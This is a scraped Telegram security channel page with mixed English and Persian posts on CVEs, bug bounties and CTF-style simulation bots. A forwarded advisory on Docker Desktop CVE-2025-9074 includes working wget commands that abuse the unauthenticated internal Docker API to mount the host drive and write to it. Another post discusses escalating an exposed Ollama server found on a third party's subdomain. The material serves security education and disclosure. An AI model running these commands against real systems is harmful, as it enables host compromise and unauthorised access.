GO-TO CVE – Telegram
GO-TO CVE
3.25K subscribers
416 photos
58 videos
234 files
978 links
Hello and welcome to the channel! Every week, we dive deep into a new CVE and share our analysis here. I’d love for you to follow us on social media.

Join our chat on Telegram via the link below: https://news.1rj.ru/str/gotocvechat

Secured by = 🧿
Download Telegram
CVE-2024-12877-week-66.pdf
1002 KB
🎯 CVE-2024-12877 Review – GiveWP goes unserialize()… Hello RCE! ⚡️🔥
Hello hackers, bug hunters, and curious minds! Welcome to Episode 66 of the GO-TO CVE series! 🎙💻

This week we’re cracking open a classic PHP Object Injection inside GiveWP, one of the most popular WordPress donation plugins. 🕳🐘

🔹 Week: 66
🔹 CVE: CVE-2024-12877
🔹 Type: PHP Object Injection
🔹 Target: GiveWP (WordPress Plugin)

📌 What’s the story?
GiveWP uses PHP’s notorious unserialize() on user input. That means attackers can drop in a crafted serialized payload, and PHP will happily invoke magic methods like __wakeup() — executing attacker-controlled logic without warning.

👾 What’s the impact?

Remote Code Execution (RCE) 🚀
Sensitive data theft (donors, users, configs) 🕵️‍♂️
Privilege escalation across WordPress 🔑
Full server compromise ☠️

💡 Lesson learned: Regex checks won’t save you. The real fix? Never unserialize untrusted input.

📬 Stay tuned with GO-TO CVE for a fresh bug every week:
👉 https://news.1rj.ru/str/GOTOCVE

#week_66
🔥83👍2👏1
GO-TO CVE pinned a file
بریم دیگه الکترو مغناطیس بخونیم که وضعیت خرابه 😂
😁1
https://news.1rj.ru/str/CVEdb چنل دوم ما رو دنبال کنید عزیزان اگه دوست دارید اپیزود هارو یک جا ببنید
👍1
Forwarded from HackMeLocal
🕹 یک مینی‌چالش جدید داریم!

این مدت احتمالاً دیدین که بعضی دیتاهای یه ربات تلگرام لیک شده.
اما این یعنی تلگرام آسیب‌پذیره؟
(فکررررررر نکنمممم 😏)

برای همین یک شبیه‌سازی ساختیم تا خودتون ببینید دیتا‌هایی که از ربات‌ها لیک می‌شن به چه صورت به دست میان.

یک ربات مخصوص رای‌گیری ساختیم:

@HML_Simulation_BOT

تو این ربات سه شخصیت برای رأی‌گیری آماده هستن:

🦆 DuckMen
🐺 Wolfy
👴 Just a random old man

می‌تونید هر چند بار که بخواید رأی بدید.
ولی این همه ماجرا نیست…

⚠️ یه آسیب‌پذیری توی سیستم رأی‌گیری قایم شده که می‌تونه لیست ادمین‌ها رو لو می‌ده.
ما نمی‌دونیم دقیقاً چجوری ادمین‌هامون لو میرن، اما اولین نفری که آسیب‌پذیری رو پیدا کنه و گزارش بده، رایت‌آپش به اسم خودش داخل سایت و کانال منتشر .

@HackMeLocal

#BugBounty #TelegramBot #Vulnrability #CTF #HackMeLocal
🔥123
GO-TO CVE
CVE-2024-12877-week-66.pdf
کاش کانال های ایرانی حداقل از همدیگه حمایت میکردن ( چند تا عزیزان همیشه حمایت میکنن دمشون گرم ) سر همینه فعالیت خارجی رو بیشتر دوست دارم چون واقعا برای محتوا ارزش میزارن
👍175👎1
چالش اعتماد

chrome://gpu?b=%%%%%%%%%%%%%%%%%%

اگه یکی همچین چیزی رو بهتون بده اجراش میکنید !؟ ( تو کروم باز کنید )
👍5🦄3
Forwarded from pooriya
تعصب داشتن روی چیزی بنظرم خوب نیست
روی لینوکس خیلی از برنامه هارو نداری
👍71👎1
امشب تو یه لایوی با بچه ها کار میکردیم
یه سابدامین پیدا کردیم که روش ollama آورده بودن بالا بدون auth میتونستیم همه کار انجام بدیم مثلا model جدید بیاریم بالا رو سرور طرف
مدل های دیگه رو حذف کنیم و این حرفا

به نظرتون باگه؟
اگه آره severity چند میشه

و آیا میشه باگه رو اسکلیت کرد مثلا به مدل هاش بگیم کامند ران کنه یا هرچی
3
Forwarded from Xero Notes
🐋 آسیب‌پذیری CVE-2025-9074 در Docker Desktop

اخیرا از آسیب‌پذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را می‌دهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیب‌پذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی می‌توان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.

💥 این آسیب‌پذیری چطور به وجود آمده است؟

در Docker Desktop نسخه‌های قبل از ۴.۴۴.۳، هر کانتینری می‌توانست به API Docker با آدرس http://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم می‌تواند یک کانتینر جدید با دسترسی‌های ویژه راه‌اندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم می‌کند.

💠 نمونه کد برای آزمایش آسیب‌پذیری

ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh


سپس با استفاده از پیلود زیر، آسیب‌پذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json

cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start


این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create


یک کانتینر جدید با دستور echo pwned > /mnt/host_root/pwn.txt می‌سازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ می‌کند.

📊 امتیاز CVSS

این آسیب‌پذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار می‌گیرد:

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H


راه‌حل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.

🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074

#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
14
برای سلامتی پدر یکی از عزیزان دعا کنید درگیر مریضی سختی هستن ( انشالله خدا سایه پدر و مادر هارو بالای سر بچه هاشون نگه داره ) 🙏❤️
106👍2🙏2
Forwarded from HackMeLocal
سورس ربات تلگرامی که برای شبیه‌سازی آسیب‌پذیری SQL Injection ساخته شده، روی گیت‌هاب منتشر شد 👇

https://github.com/e1l1ya/telegram-bot-sqli-simulation/

اگر براتون جالب بود، خوشحال می‌شم با ⭐️ دادن به ریپازیتوری از این پروژه حمایت کنید 🙌

همچنین تجربه‌ی کشف و شبیه‌سازی این باگ رو به صورت کامل در یک مقاله روی مدیوم نوشتم:

https://medium.com/@e1l1ya/how-i-found-sql-injection-in-a-telegram-bot-and-built-a-simulation-41ed994c4c03

#Simulation #SQLi #TelegramBot

@HackMeLocal
🔥154🙏2
امتحان فردا و شنبه رو پاس بشم یعنی رسما 😂 کار عجیب غریب کردم
😴122👍2
دعا کنید
122👎2🔥1🗿1